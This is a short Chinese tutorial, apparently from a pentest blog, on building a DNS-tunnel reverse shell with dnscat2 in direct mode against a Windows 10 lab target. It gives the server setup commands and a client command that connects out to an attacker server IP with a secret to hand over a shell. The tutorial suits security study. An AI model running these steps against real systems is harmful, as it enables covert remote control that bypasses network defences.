使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
xiaoliuliu1234526 分钟前
Xshell-7.0.0111p安装步骤详解(附SSH连接与远程命令教程)
运维·ssh
gaize121332 分钟前
服务器是什么?用来做什么?基本属性有什么?如何配置和挑选?
运维·服务器
谢斯1 小时前
[AFFine]文档系统,docker搭建
运维·docker·容器
unable code1 小时前
流量包取证-大流量分析
网络安全·ctf·misc·1024程序员节·流量包取证
qq_297815271 小时前
Docker Compose 部署 RocketMQ 5.4.0 完整指南(Windows Docker Desktop 专属)
windows·docker·rocketmq
сокол2 小时前
【网安-Web渗透测试-漏洞系列】逻辑漏洞(或越权漏洞)
web安全·php
坂田民工2 小时前
RK3566 AB升级功能
linux·rk3566·buildroot·ab升级
SakitamaX3 小时前
LVS(Linux virual server)介绍与实验
linux·运维·lvs
小义_3 小时前
【Docker】知识八
linux·docker·云原生
开开心心_Every3 小时前
CDR版本转换工具,支持多版本互转免升级软件
linux·运维·服务器·云原生·edge·pdf·serverless